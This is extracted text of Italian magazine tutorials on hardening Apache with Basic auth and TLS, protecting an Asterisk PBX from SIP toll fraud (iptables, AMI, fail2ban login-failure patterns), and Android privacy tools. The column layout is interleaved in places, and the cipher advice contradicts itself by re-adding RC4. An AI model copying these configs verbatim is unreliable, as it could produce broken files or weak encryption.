all’interno della sezione <VirtualHost *:80> del file /etc/
apache2/sites-available/lxpWeb1.conf:
ServerName lxpWeb1.local
ServerAlias www.lxpWeb1.local
DocumentRoot /var/www/html/lxpWeb1
Facciamo la stessa cosa anche con il file lxpWeb2.conf,
mettiamo un contenuto in ogni DocumentRoot e abilitiamo
i due siti:
$ sudo a2ensite lxpWeb1.conf
$ sudo a2ensite lxpWeb2.conf
Ecco fatto! Due siti Web pronti all’azione, tre se accediamo
al Web server tramite indirizzo IP o un dominio diverso da
quelli elencati; il terzo sito risponde alle regole impostate
Firefox non nella configurazione di default 000-default.conf, che siete
si fiderà di
liberi di modificare, o se preferite di disabilitare del tutto,
un certificato
se pensate che il vostro server Web dovrebbe ricevere visite
prodotto da voi.
Come dargli soltanto tramite nomi e non con dei numeri. Apache può
torto? essere gestito tramite directory oltre che tramite siti.
90
Per il primo modo bisogna utilizzare i file .htaccess,
posizionandoli nelle directory appropriate, ma siccome si
tende a dimenticarsene può essere utilizzata anche la
direttiva <Directory> all’interno del file di configurazione del
sito. Ora andremo ad aggiungere un’area sicura al nostro sito
lxpWeb1.local, in modo che ci si possa accedere soltanto
tramite password. Per prima cosa creiamo la directory che
conterrà la nostra area protetta e inseriamoci un contenuto:
$ sudo mkdir /var/www/html/lxpWeb1/sicuro
$ cd /var/www/html/lxpWeb1/sicuro
$ echo Area di massima sicurezza - vietato fotografare |
sudo tee index.html
Ora modifichiamo /etc/apache2/sites-available/lxpWeb1
e aggiungiamo quanto segue verso la fine della sezione
<VirtualHost *:80>:
<Directory /var/www/html/lxpWeb1/sicuro>
AuthName “Area Sicura”
AuthType Basic
AuthUserFile /var/www/.htpasswd
require valid-user
</Directory>
Utilizzato in questo modo il meccanismo di autenticazione
Basic si limita a controllare la combinazione nome utente
e password all’interno di un file. Questo file è gestito dal
programma htpasswd che è parte del pacchetto apache2-
utils, e che noi andiamo ora a installare e utilizzare.
$ sudo apt-get install apache2-utils
$ sudo htpasswd -c /var/www/.htpasswd lxpuser
Viene chiesta una password per l’utente lxpuser. Lo switch
-c crea un nuovo file, ma se si vogliono creare altri utenti
basta utilizzare lo stesso comando senza questo switch.
Ora rilanciamo Apache:
$ sudo service apache2 reload
Asndando all’indirizzo http://lxpWeb1.local/sicuro/ verrà
chiesto uno username e una password. Inserendo dei dati
errati continuerà a riaprirsi la richiesta della password.
Esistono metodi di autenticazione più avanzati come
controllare gli utenti su un database o tramite LDAP, oppure
aggiungendo dei criteri come per esempio accettare
richieste solo da specifici indirizzi IP. Date un’occhiata alla
documentazione per maggiori dettagli: http://bit.ly/
ApacheAuthDocs (in inglese). È importante che il file
.htpasswd si trovi all’esterno della DocumentRoot dei siti;
questo tipo di errore è molto grave perché potrebbe far
sì che il Web server permetta il download di questo file
andando per esempio all’indirizzo http://lxpWeb1.local/.
htpasswd. Nel nostro caso abbiamo dei siti Internet che
utilizzano sottodirectory di /var/www ma possiamo
utilizzare la directory radice.
HTTPS
Tutti i dati inviati tramite una richiesta HTTP o ricevuti come
risposta sono trasmessi in chiaro. Chiunque abbia accesso
a una macchina che si trova tra voi e il server può leggere
i dati che passano o addirittura modificarli. Di certo non
è molto soddisfacente, soprattutto se vogliamo trasmettere
dati personali o finanziari. Per ovviare a questo problema
possiamo utilizzare la tecnologia SSL/TLS attraverso
il protocollo HTTPS. L’SSL correttamente implementato
fornisce due cose: crittografia: i dati scambiati tra server e
client sono offuscati da algoritmi matematici molto potenti;
autenticazione: possiamo essere sicuri che il sito Web che

stiamo guardando è veramente chi dice di essere. Mentre
la matematica che sta dietro alla crittografia è stata
ampiamente studiata (anche se a volte non ben
implementata), i problemi che affliggono l’autenticazione
sono un po’ più spinosi. Al momento la soluzione è quella
di credere (ciecamente) a un insieme di Certificate
Authorities (autorità certificanti o semplicemente CA)
che offrono, a pagamento per scopi commerciali ma
gratuitamente per usi personali, la loro garanzia su di un sito
Web sotto forma di firma digitale nel certificato del sito
stesso. La vostra distribuzione mantiene una lista delle CA
di cui si fida nel pacchetto ca-certificates. A volte la fiducia
viene revocata a causa di qualche scandalo, e i browser
controllano con frequenza la lista di certificati revocati per
minimizzare il rischio di danni. A questo punto è necessario
dire al server Web di utilizzare queste credenziali per gestire
le connessioni HTTPS, che di solito si svolgono sulla porta
443. Potete offrire HTTP in parallelo a HTTPS, oppure potete
rendere il vostro sito Web (o una parte di esso) accessibile
soltanto tramite HTTPS. Un’installazione standard di Apache
contiene il file /etc/apache2/sites-available/default-ssl.
conf, che possiamo modificare leggermente per raggiungere
i nostri scopi, per esempio abilitare come sito SSL il nostro
lxpWeb1.local. Come prima, copiamo il file di default:
$ cd /etc/apache2/sites-available
$ sudo cp default-ssl.conf lxpWeb-ssl.conf
E modifichiamo il file lxpWeb-ssl.conf in questo modo:
<VirtualHost *:443>
ServerName lxpWeb1.local
DocumentRoot /var/www/html/lxpWeb1
...
SSLCertificateFile /etc/apache2/ssl/server.crt
SSLCertificateKeyFile /etc/apache2/ssl/server.
keySSLCertificateKeyFile /etc/apache2/ssl/server.key
Dovremmo anche vietare l’utilizzo di pacchetti crittografati
con tecniche obsolete per evitare attacchi. La crittografia
vecchia e debole chiamata ‘export’ che ha dato luogo ai
recenti attacchi chiamati FREAK, così come molte altre
crittografie minori, sono disabilitate di default nei pacchetti
Apache/OpenSSL di molte distribuzioni.
Ciò nonostante vediamo di aumentare un altro po’ la
sicurezza modificando come segue il file /etc/apache2/
mods-available/ssl.conf:
SSLHonorCipherOrder on
SSLCipherSuite HIGH:!MEDIUM:!LOW:!aNULL:!eNULL:!E
XPORT:!MD5:!RC4:!3DES:!PSK:!SRP:!DSS
SSLProtocol all -SSLv2 -SSLv3
SSLInsecureRenegotiation off
SSLCompression off
Disabilitando il protocollo deprecato SSLv3 evita di subire
attacchi POODLE (oltre che di avere visitatori che utilizzano
IE6), disabilitare la compressione ci protegge dagli attacchi
CRIME. Potete omettere questa riga se siete più preoccupati
della vostra connessione che di eventuali attacchi.
Vale la pena considerare anche la perfect forward secrecy
(chiamata segretezza in avanti): l’obiettivo del processo di
negoziazione SSL è quello di trovare una chiave di sessione
conosciuta soltanto dal server e dal client e poi scartarla
dopo l’utilizzo. Nuove chiavi vengono scambiate
frequentemente, in modo che una chiave compromessa
rubata al server da sola non sia sufficiente per recuperare
dati dalla sessione. Sfortunatamente il meccanismo di
Server Web
A quanto
pare siamo
entrati in
un’area
sicura. Ce lo
garantisce
un modello
di cifratura
moderno
dotato
di perfect
default per scambiare le chiavi (sia esso RSA o fixed Diffie- forward
secrecy
Hellman) non lavorano in questo modo, quindi dobbiamo
dire ad Apache di usare questo nuovo metodo modificando
la riga di SSLCipherSuite. È una buona idea offrire alcune
alternative dato che non tutti i browser supportano per
esempio TLS 1.2 che è richiesta dalla crittografia Elliptic
Curve. Il risultato finale sarà una riga molto lunga, quindi
sostituite semplicemente la parola HIGH dalla riga di prima
con la seguente combinazione
EECDH+ECDSA+AESGCM:EECDH+aRSA+AESGCM:EEC
DH+ECDSA+SHA256:EECDH+aRSA+SHA256:EECDH+aRS
A+RC4:EECDH:EDH+aRSA
In questo modo vengono favoriti i più recenti e veloci Elliptic
Curve Diffie-Hellman, ma permette anche i più lenti ma con
maggior supporto Ephemeral DH, tutte con una buona
varietà di cifrature e hashes. Ora abilitiamo il modulo SSL,
il nostro nuovo sito e rilanciamo Apache:
$ sudo a2enmod ssl
$ sudo a2ensite lxpWeb-ssl
$ sudo service apache2 restart
A questo punto andando nel vostro sito Web (se non avete
pagato per un certificato firmato) vi comparirà un enorme
avviso relativo al fatto che il sito non è affidabile. Potete
tranquillamente aggiungere un’eccezione e continuare nel
vostro sito sicuro. Con Firefox le eccezioni possono essere
salvate per non venire continuamente perseguitati da avvisi.
Se volete ridirezionare il traffico dei siti HTTP vi basterà
aggiungere la riga che segue nel file /etc/apache2/sites-
available/lxpWeb1.conf dopo la riga ServerName
lxpWeb1.local:
Redirect permanent / https://lxpWeb1.local/
Oppure potete forzare l’HTTPS soltanto per la directory
sicuro che abbiamo visto all’inizio del tutorial:
Redirect permanent /sicuro https://lxpWeb1.local/sicuro
Se state utilizzando Chrome o Chromium dovrete
aggiungere il vostro certificato alle vostre chiavi utilizzando
il programma certutil. Cliccate sull’icona dell’HTTPS
sbarrato -> connessione -> informazioni certificato ->
dettagli -> Esporta... e salvatelo come lxpWeb.crt. Ora
bisogna importare il certificato nel database NSS locale:
$ certutil -d sql:$HOME/.pki/nssdb -A -t P -n lxpWeb -i
lxpWeb.crt
Anche se è rassicurante avere l’icona del lucchetto vicino
all’URL, aggiungere eccezioni di sicurezza in questo modo
è potenzialmente pericoloso, potreste dimenticarvi di averlo
fatto e se siete sfortunati, la chiave del vostro server
potrebbe essere rubata. Con questa chiave un attaccante
potrebbe in futuro creare un sito Web fraudolento al quale
il vostro browser crederebbe a prescindere. Con questo
si conclude la nostra introduzione di Apache. Fate attenzione
a ciò che rendete disponibile al mondo e cercate di non
infrangere alcuna legge.
91
 Dispositivi Mobili

FRODI SIP
Occhio al portafoglio!
Cos’è Scoprite i rischi connessi al mondo VoIP
SIP? e come mettervi al sicuro da bollette
Session Initiation
Protocol (SIP) che farebbero piangere chiunque
è un protocollo
per la segnalazione
e il controllo
delle sessioni
di comunicazione
multimediale.
Per le chiamate
audio e video,
la telefonia
IP utilizza
comunemente SIP.
Le sue impostazioni
definiscono
i dati inviati tra
gli endpoint,
le regole
di chiamata,
le terminazioni
e molto altro ancora.

I
l mondo delle telecomunicazioni diventato il nuovo standard per le di soluzioni Open Source ha permesso
è significativamente cambiato comunicazioni moderne. Con il Private agli smanettoni più sfegatati e a diverse
a partire dal XXI secolo. L’uso Branch Exchange (PBX) basato su IP, aziende di implementare in tutta libertà
della tecnologia VoIP un proprio sistema
( Voice over Internet
Protocol ) ha permesso
“Sono tanti i criminali che di telefonia. Purtroppo,
però, c’è anche il rovescio
a molte aziende
di migliorare la qualità
possono sfruttare la libertà della medaglia. Sono tanti
i criminali e le potenziali
della telefonia, riducendo del VoIP per riempirsi le tasche” organizzazioni di
al contempo i costi malfattori che possono
di gestione e manutenzione. i sistemi sono in grado di offrire molte lucrare su questa libertà, trasformandola
Se fate un balzo in avanti di un decennio, più funzioni rispetto alle piattaforme così in un moderno incubo fatto di cifre
vi accorgerete subito come VoIP sia legacy PBX. Non solo, ma il vasto mondo da capogiro.

92

Cos’è
una frode SIP?
Una truffa SIP consiste nello
sfruttare a scopi di lucro
un sistema telefonico IP di qualcun altro.
L’hacker, di solito, si trova in un paese
diverso da quello del malcapitato.
A peggiorare la situazione c’è anche
un’endemica incapacità delle forze
dell’ordine nel gestire queste situazioni.
Il malfattore si connette a un IP PBX via
Internet, utilizzando una serie di tecniche
che gli permettono di manipolare il sistema
per inoltrare le proprie chiamate.
Nella maggior pare dei casi, lo scopo
dell’attacco non coincide con il furto
di informazioni personali, né con la volontà
di compromettere l’integrità del sistema.
Molto più semplicemente, l’obiettivo
è scroccare telefonate a numeri molto
costosi. L’hacker stabilisce un accordo con
un fornitore di numeri a tariffa maggiorata.
Chiamando questi recapiti a ripetizione,
si assicura una percentuale sul traffico.
Quali sono
i rischi?
Se gestite un vostro IP PBX,
siete potenzialmente a rischio
di truffe SIP. Un errore molto comune è non
sentirsi chiamati in causa perché semplici
utenti. È vero che la maggior parte delle
imboscate colpisce i provider di servizi per
la telefonia, ma il pericolo per gli utilizzatori
finali è altrettanto reale. Se siete piccoli
imprenditori che hanno investito sul proprio
IP PBX e avete un accordo con un fornitore
di SIP trunk, potreste pensare di non essere
tra le mire degli hacker. Purtroppo non
è così. Basta veramente poco perché un
criminale riesca a ottenere l’accesso a un IP
PBX non garantito e far lievitare la bolletta
del telefono oltre misura. In questo articolo
vedremo alcuni semplici ma importanti
passaggi per mettersi in sicurezza.
Non potrete ridurre a zero il rischio di frodi,
ma almeno sarete in grado di rendere
la vita più difficile a chi tenta di fregarvi.
Utilizzeremo in particolare Asterisk PBX
su CentOS, ma i passaggi sono adattabili
a qualsiasi piattaforma PBX su distro Linux.
I rischi del mondo VoIP
Prevenire gli attacchi
Difendersi e prevenire le truffe
SIP non è impossibile. In primo
luogo, è importante fare una
precisazione. Ci sono molti modi per
hackerare un sistema telefonico. Le tecniche
più utilizzate dipendono dal fornitore
o produttore del PBX. A tal proposito,
è indispensabile integrare il maggior numero
di misure per la sicurezza. Diversi fornitori
di SIP trunk offrono sistemi per il rilevamento
delle frodi. Uno di questi è il limite preventivo
di spesa per il proprio account telefonico.
Così facendo, qualora il trunk venga violato,
potrete limitare i danni e cavarvela con
il massimale scelto.
In aggiunta, si può
cooperare con “Abilitare l’accesso remoto
il provider per
consentire o bloccare al PBX può facilitare
determinate chiamate.
Se non avete
il compito degli hacker”
bisogno di inoltrare
comunicazioni internazionali o a numeri
premium, vi consigliamo di disabilitare
entrambe le opzioni.
Password
complesse
Può sembrare semplice
e scontato, ma in un mondo
dove si utilizzano innumerevoli password per
altrettanti servizi, la tentazione di usare
chiavi di accesso facilmente rintracciabili
è sempre dietro l’angolo. Quando configurate
le credenziali SIP, utilizzate sempre
password molto complesse e soprattutto
nuove. Non fate l’errore di usare la stessa
in più occasioni. In questo modo, ridurrete
l’efficacia di eventuali attacchi Brute Force
o Dictionary. Un buon esempio di chiave
robusta è costituito da una stringa che va
dagli 8 ai 20 fattori, senza parole di senso
compiuto, con caratteri speciali (per
esempio ! @ # $) e case sensitive (alterna
lettere maiuscole a minuscole).
Se possibile, infine, cambiate la password
a intervalli brevi e regolari.
Connessioni
Usando la telefonia IP, potete
connettervi al vostro PBX
indipendentemente dal paese
in cui vi trovate. Siete in grado di installare
un client SIP nello smartphone e chiamare
chiunque al prezzo di un’urbana. Purtroppo,
consentendo l’accesso in remoto al PBX,
essere preda di un hacker è piuttosto facile.
Applicare una rigida politica di sicurezza,
diventa quindi essenziale. Anziché
permettere connessioni al PBX da qualsiasi
parte del pianeta, è meglio bloccare tutto
il traffico esterno. Tramite una whitelist
di indirizzi IP, gestirete le comunicazioni solo
tra terminali sicuri. Naturalmente, se non
utilizzate un indirizzo IP statico, le cose
93
 Dispositivi Mobili
si complicano. Tuttavia, il fastidio di
aggiornare la lista degli IP è davvero minimo,
se comparato al pagamento di una bolletta
da capogiro.
Iptables da amare
Il traffico SIP può essere
tenuto sempre sotto stretto
controllo. Sapete sempre
da dove viene e dove va. Come già detto,
applicare una rigida e intransigente
sicurezza è la soluzione migliore per mettersi
al riparo da possibili truffe. Bloccate del tutto
il traffico esterno, tranne gli indirizzi IP
affidabili. Gli identificativi devono essere
inseriti in una specifica whitelist. Il primo
tra tutti è quello del vostro SIP trunk.
A seguire, aggiungete gli IP dei vari cordless.
Ecco un semplice esempio:
-A INPUT -s xxx.xxx.xxx.xxx -d 0/0 -p udp -m
multiport --dport
5060,4569,5036,2727,10000:20000 -j ACCEPT
Tipica regola per SIP:
-A INPUT -s xxx.xxx.xxx.xxx -d 0/0 -p udp
-m multiport --dport 5060,10000:20000 -j
ACCEPT
Alla fine del set, bloccate tutto il resto:
-P INPUT REJECT
Potete aggiornare la lista degli IP tramite
il comando iptables, oppure modificando
il file iptables con un editor di testo.
Nel nostro caso abbiamo usato vi. Asterisk
sfrutta un determinato numero di porte
per comunicare con gli endpoint.
Ecco quali sono:
5060 – SIP (signalling).
4569 – IAX2 (Inter-Asterisk eXchange).
5036 – IAX (se utilizzate IAX, potete
modificarlo come IAX2)
10000:20000 – RTP (stream
multimediale)
2727 – MGCP (se utilizzate un protocollo
per il controllo del gateway)
Asterisk Management Interface (AMI)
“Fail2ban è un filtro per il
blocco degli indirizzi IP che
tentano di forzare il sistema”
Potete permettervi di correre il rischio?
Purtroppo, i casi di successo
nell’individuare i responsabili
di una frode SIP si contano
sulle dita di una mano.
I criminali si nascondono
spesso in paesi dove cercarli può essere
davvero difficile. Senza contare le
difficoltà dovute alle leggi che variano
94
consente a client e script di connettersi
a un’istanza di Asterisk, quindi inserire
comandi per la lettura del flusso TCP/IP.
Si tratta di uno strumento davvero
fantastico, utile per gli sviluppatori che
devono tenere sotto controllo le trasmissioni.
Attenzione, però! Se non viene gestito
correttamente, AMI può creare una
backdoor nel PBX. In definitiva, se non
ne avete bisogno, è meglio disabilitarlo.
Nel caso vogliate gestirlo in maniera
approfondita, potete mettere mano al file
/etc/asterisk/manager.conf.
Disabilitate completamente AMI:
[general]
enabled = no
webenabled = no
Se necessario, mettetelo in sicurezza:
[general]
enabled = yes
webenabled = no
port = 1685 ; it is worth changing the
default listening port from 5038
allowmultiplelogin = no
[username]
secret = password
deny = 0.0.0.0/0.0.0.0
permit = 127.0.0.1/255.255.255.255
permit = xxx.xxx.xxx.xxx/255.255.255.255 ;
any relevant external IP addresses
Fail2ban
Fail2ban controlla i file di log
alla ricerca di valori specifici,
svolgendo azioni basate
su di essi. Questo potente strumento viene
utilizzato per bloccare gli indirizzi IP di host
che tentano di violare il sistema. Un esempio
può essere quello di un hacker che prova
ripetutamente a indovinare nome utente
e password. Fail2ban lavora bene anche
con Asterisk. Installatelo con:
yum install fail2ban
Passate alla
configurazione:
touch /etc/fail2ban/
filter.d/asterisk.conf
Seguite le seguenti
stringhe:
di Stato in Stato. Da questo punto di vista,
le probabilità di essere risarciti dopo una
truffa SIP sono molto basse. Questa dura
realtà può causare veri disastri finanziari,
mettendo in ginocchio le aziende che non
hanno capitali sostanziosi su cui contare.
A differenza delle frodi a mezzo carta di
credito, non ci sono norme che obbligano
failregex = NOTICE.* .*: Registration from
‘.*’ failed for ‘<HOST>:.*’ - Wrong password
NOTICE.* .*: Registration from ‘.*’
failed for ‘<HOST>:.*’ - No matching peer
found
NOTICE.* .*: Registration from ‘.*’
failed for ‘<HOST>:.*’ - No matching peer
found
NOTICE.* .*: Registration from ‘.*’
failed for ‘<HOST>:.*’ - Username/auth name
mismatch
NOTICE.* .*: Registration from ‘.*’
failed for ‘<HOST>:.*’ - Device does not
match ACL
NOTICE.* .*: Registration from ‘.*’
failed for ‘<HOST>:.*’ - Peer is not supposed
to register
NOTICE.* .*: Registration from ‘.*’
failed for ‘<HOST>:.*’ - ACL error (permit/
deny)
NOTICE.* .*: Registration from ‘.*’
failed for ‘<HOST>:.*’ - Device does not
match ACL
NOTICE.* <HOST> failed to
authenticate as ‘.*’$
NOTICE.* .*: No registration for peer
‘.*’ \(from <HOST>\)
NOTICE.* .*: Host <HOST> failed
MD5 authentication for ‘.*’ (.*)
NOTICE.* .*: Failed to authenticate
user .*@<HOST>.*
NOTICE.* .*: Sending fake auth
rejection for device
.*\<sip:.*\@<HOST>\>;tag=.*
touch /etc/fail2ban/filter.d/asterisk.conf
Codici PIN
Per evitare che la bolletta
telefonica lieviti, un altro
sistema consiste nell’uso di un
PIN per le chiamate in uscita. Ci sono diversi
modi per implementare questa funzione.
In ogni caso l’obiettivo è sempre lo stesso:
fare in modo che gli utenti si autentichino
prima di inoltrare una telefonata. Sfruttare
un PIN non vi mette al riparo dagli hacker,
ma è una buona risorsa per controllare
il flusso di comunicazioni. Assegnando
un codice numerico a ogni persona, saprete
sempre chi ha fatto una chiamata e a quale
i provider a risarcire il cliente finale.
Dimostrare che non siete voi ad aver fatto
le chiamate non porta a niente. Queste
considerazioni devono convincervi ancora
di più a mantenere alta la guardia.
Fate sempre affidamento sugli strumenti
per la protezione attualmente disponibili.
Ce ne sono molti a costo zero.
 I rischi del mondo VoIP

numero. Non solo, ma potrete

regolare un limite di spesa
per singolo utente. Per questa
funzione ci sono diverse risorse
Open Source da utilizzare.
Con Asterisk gestite il comando
di autenticazione nel piano delle chiamate
(dialplan). Ecco come fare
[outgoing]
exten => _0X.,1,Authenticate(/etc/asterisk/
passwords/${ACCOUNTCODE})
exten => _0X.,2,Dial(${TRUNK}/${EXTEN:1})
exten => _0X.,3,Hangup()
Utilizzando questo approccio, dovrete
creare un file con una password separata
per ogni persona. Il nome del file deve
corrispondere con il callerid dello specifico
utente riportato in sip.conf.
Ecco un esempio:
[1000]
type=friend
accountcode=ABC123
context=user-ABC123
username=ABC123-1000
secret=password
nat=yes
qualify=yes delle intrusioni, pensato per mettere per non cadere preda di malfattori
language=en al sicuro le piattaforme basate e truffe di ogni genere. Dopo la diffusione
host=dynamic su Asterisk. Utilizzando una serie di apparecchi come il Raspberry Pi, molti
canreinvite=no di tecniche avanzate per rilevare sviluppatori e titolari di aziende stanno
dtmfmode=rfc2833 le credenziali compromesse, SecAst sperimentando soluzioni Open Source
defaultip=0.0.0.0 sfrutta algoritmi euristici per puntare per la gestione del traffico telefonico.
port=5060 i riflettori su attività fraudolente. Asterisk, di cui abbiamo parlato in queste
regexten=1000 Disponibile in versioni gratuite pagine, è un valido alleato.
callerid=ABC123-1000 <1000> e commerciali, questa applicazione può Il contenimento dei costi è davvero
disallow=all farvi dormire sonni tranquilli. La release significativo, ma non deve distrarvi dalle
allow=alaw a pagamento costa 475 $ (425 €), vostre responsabilità. Risparmio, infatti,
allow=ulaw mentre quella senza limiti ha un valore non può andare a braccetto con scarsa
allow=g729 di 4.600 $ (4.120 €). Per tutte sicurezza. Investite tempo e risorse
allow=gsm le informazioni su SecAst, consultate per blindare la vostra infrastruttura.
Un file password chiamato ABC123-1000 la pagina ufficiale all’indirizzo Ponete massima attenzione a valutare
viene generato in /etc/asterisk/ www.telium.ca. le esigenze di comunicazione aziendale,
passwords/ quando il comando quindi adottate le politiche più corrette
Authenticate si attiva. Infatti, il contenuto Le ultime per proteggere l’attività e il conto
del documento comprende le chiavi considerazioni in banca. Non aspettate che i buoi
di accesso utili per verificare gli utenti. Proteggere il vostro sistema scappino dalla stalla. Allora sarà troppo
PBX non è un’opzione, ma tardi. Le truffe SIP sono tanto rapide
Rilevare un preciso obbligo. La consapevolezza quanto devastanti. Spesso non
le intrusioni dei rischi che si corrono è fondamentale vi accorgete neppure di essere caduti
Per proteggere il vostro PBX nella tela del
da truffe SIP, potete
sfruttare un gran numero di soluzioni
“Risparmio non deve essere ragno, se non
all’arrivo della
indipendenti. Un buon esempio
è SecAst di Telium. Si tratta di un
sinonimo di scarsa sicurezza: prima bolletta.
Allora saranno
sistema di prevenzione e rilevamento investite sempre!” dolori!

95
 Dispositivi Mobili

Android sicuro
Lo smartphone è la vostra casa:
vi aiutiamo a capire come metterlo in sicurezza
S
e qualcuno fosse veramente interessato, e probabilmente anche informazioni finanziarie che il 97% delle applicazioni provate accede
potrebbe rilevare la vostra esatta posizione personali. Come se non bastasse, il telefono può impropriamente a fonti di informazioni private
in questo preciso momento. Probabilmente monitorare continuamente la vostra posizione contenute nel dispositivo. Ha poi rilevato
vedrebbe perfino cosa state leggendo per costruire un profilo dettagliato degli che l’86% degli utenti non aveva alcun mezzo
e registrerebbe anche i respiri che emettete. spostamenti. I modi che questi dispositivi utilizzano per proteggersi dai comuni exploit. Non ci sono
Nel frattempo, il malintenzionato di turno avrà letto per inviare i dati e le informazioni sul vostro conto però solo brutte notizie, ma anche qualche aspetto
tutti i vostri messaggi, rubando i contatti sono davvero tanti e questo è un problema tanto positivo. Infatti, gli smartphone consentono
e controllando il credito residuo di modificare numerose
sulla SIM dello smartphone.
Questa non è fantascienza,
“Il 97% delle app provate accede impostazioni relative alla privacy
con un semplice tocco. Non sarà
ma la dura realtà. Forse non ci fate
caso, ma in tasca avete il miglior amico
indebitamente alle vostre quindi difficile iniziare a tappare
le falle della sicurezza. In questo
dei ficcanaso. Lo portate ovunque: informazioni personali” articolo diamo un’occhiata ai vari
dal vostro ufficio alla camera da letto, modi in cui l’utilizzo del telefono può
dalla sala da pranzo al bagno. Registra tutto quello per coloro che vogliono rimanere anonimi, quanto essere una seria minaccia per le vostre informazioni
che fate e può rivoltarvelo contro in pochi minuti. per l’utente medio. In realtà, anche se non personali, ma valuteremo anche le azioni
Che ci crediate o no, lo smartphone moderno utilizzate lo smartphone per inoltrare per ridurre al minimo questo pericolo. Vedremo
è il peggior incubo della privacy. Pensate a quello una chiamata, state già trasmettendo informazioni poi alcuni strumenti che vi consentono di prendere
che avete memorizzato al suo interno: indirizzi, solo per il fatto di averlo acceso. In un recente il controllo sulla privacy e aiutano a comunicare
e-mail, numeri di telefono, appuntamenti, foto studio condotto da HP, l’azienda ha scoperto con i contatti senza compromettere la riservatezza.

96

Siete tutti osservati
Prevenite la curiosità delle app che vogliono accedere ai vostri dati
L
a maggior parte dei compiti che una volta
venivano eseguiti solo dai computer, adesso
fa parte del background funzionale
dei cellulari. Questi, infatti, possono essere usati come
lettori multimediali, registratori, dispositivi per giocare,
navigatori GPS e molto altro ancora. Ovviamente,
per sfruttare tutte queste comodità sono necessarie
applicazioni dedicate. Purtroppo, però, sono proprio
le app l’anello debole della catena per quanto
riguarda la diffusione dei dati personali. Molte
di queste accedono ai vostri documenti per migliorare
l’esperienza d’uso, ma il problema risiede nel dovervi
assicurare che quanto utilizzato dall’applicazione non
venga inviato a soggetti terzi. Purtroppo, non tutte
le app spiegano nel dettaglio cosa ne faranno
dei vostri dati e quindi non potete sapere se siete
veramente al sicuro. Ci sono poi i servizi Web gratuiti
come Google, Twitter, Facebook e altri, che pur non
facendovi sborsare un euro, chiedono in cambio
informazioni sulla vostra persona. Queste vengono
utilizzate per migliorare il targeting degli annunci
e se per alcune persone questo non è un problema,
per chi tiene alla propria privacy non è certo
il massimo. Uno degli strumenti principali del vostro
smartphone Android è il sistema di autorizzazioni.
Quando installate un’applicazione, essa vi informa
su quali funzioni intende mettere le mani ed è quindi
possibile scegliere se andare avanti o meno
Imparare a utilizzare XPrivacy richiede
tempo, perché non è né semplice né immediato
Protezione per il telefono
con la procedura. Purtroppo, questo sistema
addossa molta responsabilità agli utenti, che in teoria
dovrebbero sapere se tali richieste di accesso sono
giustificate. Secondo alcuni studi (fonte: http://bit.
ly/1bRbsVr), molte app richiedono fin troppe
autorizzazioni. Ci sono però diversi modi per
visualizzare le richieste fatte dalle applicazioni stesse.
L’app gratuita Clueful di BitDefender consente
di identificare ciò che un’applicazione sta facendo,
mettendolo in relazione con cosa invece dovrebbe
fare. Clueful, una volta installata, scansiona tutte
le vostre app classificandole con tre generi di rischio:
alto, medio, basso. È quindi possibile controllare la lista
e selezionare ciascuna applicazione, scoprendo
a quali funzioni può accedere. Se per caso dovessero
essere rilevati software ad alto rischio, il nostro
consiglio è di disinstallarli. C’è poi Anti-Malware
di Malwarebytes, che include anche un Privacy
Manager capace di analizzare le applicazioni
e dividerle in categorie secondo le funzioni dello
smartphone a cui hanno accesso. Quest’app sarà
quindi utile quando volete visualizzare tutti i software
che entrano in contatto con le vostre informazioni
personali, come l’elenco dei contatti o la cronologia Web.
Controllare i permessi
Una volta identificata un’applicazione pericolosa per
la privacy, è possibile rimuoverla. Google, in Android
4.3, si è recentemente lasciato sfuggire una
funzionalità interessante per la protezione dei dati
personali, che potete sbloccare tramite lo strumento
Aps Ops. In pratica, per ogni applicazione, potrete
disattivare singolarmente ogni voce che prende
in considerazione la vostra privacy. Per esempio,
installando Shazam avete i permessi per disabilitare
la funzionalità che gli permette di rilevare la vostra
posizione. Purtroppo Google ha poi rimosso
questa gradita funzione e, alla seguente richiesta
di spiegazioni, ha affermato che l’opzione in questione
era una semplice sperimentazione rilasciata
accidentalmente. Se usate Android con permessi
di root, potete ancora recuperare questa funzione
come modulo per il framework Xposed. Non solo,
perché sempre chi ha un dispositivo con root
può utilizzare il modulo XPrivacy per Xposed,
con cui è possibile controllare le autorizzazioni
Tre gradi di separazione
Non è necessario essere dei terroristi per fare in modo
che la NSA si interessi alle nostre comunicazioni.
L’agenzia, infatti, è autorizzata a scavare per ben tre
gradi partendo dalla persona che sta intercettando.
specifiche di tutte le applicazioni installate e,
se tenete alla vostra riservatezza, la cosa migliore
che potete fare è disattivare la funzione di accesso
ai contatti per ogni app che non ne fa strettamente
uso. XPrivacy, a questo punto, proteggerà le
informazioni reali, dando in pasto alle applicazioni che
la richiedono una lista di dati fasulli. Detto questo,
oltre a prevenire che le app carpiscano senza il vostro
consenso le informazioni memorizzate nello
smartphone, dovreste anche ridurre i dati personali
che vi contenete. Condividere le immagini scattate
con lo smartphone, per esempio, è una fonte
inesauribile di informazioni, poiché a causa dei dati
EXIF è possibile venire a conoscenza di moltissimi
particolari. Se per esempio scattate una foto con
un dispositivo dotato di GPS, un malintenzionato può
rilevare la vostra posizione, il momento stesso in cui
avete scattato l’immagine e l’ID del dispositivo. Come
avrete ben capito, quindi, rimuovere le informazioni
EXIF dalle immagini prima di condividerle è molto
importante e a questo proposito potete utilizzare
EXIF Remover, un’applicazione particolare che non
sfrutta alcuna interfaccia grafica. Una volta installata,
vi comparirà come opzione direttamente nel menu
Condividi. Se la selezionate, intercetterà tutte
le immagini che volete condividere e cancellerà i dati
EXIF prima di mandarle in giro per la Rete. Un’altra
buona abitudine per proteggere la privacy consiste
nel crittografare i file che volete condividere su servizi
Cloud come Dropbox o Google Drive. Potete farlo
facilmente su un PC Linux con EncFS. Disponibile nei
repository delle distribuzioni più popolari come Fedora
e Ubuntu, questo strumento richiede la creazione
di due directory: la prima ospita il contenuto non
crittografato, la seconda la versione criptata. Il suo
sistema di funzionamento è molto semplice: preleva
i file non crittografati dall’apposita cartella e li cifra
al volo memorizzandoli nell’altra directory.
Per utilizzare EncFS con Dropbox, basta aggiungere
la cartella crittografata all’interno dello spazio Cloud.
In questo modo tutti i cambiamenti che avvengono
nella directory criptata vengono automaticamente
sincronizzati. Dopo aver installato EncFS, create
le due cartelle con encfs ~/Dropbox/.encrypted
~/Private e, una volta risposto alle domande di rito,
l’applicazione creerà le cartelle.
Quindi può seguire il sospetto che parla con voi, voi che
parlate con un vostro amico e il vostro amico che parla
con qualcun altro. In pratica, utilizzando questo sistema,
la NSA è in grado di monitorare chiunque.
97
 Dispositivi Mobili
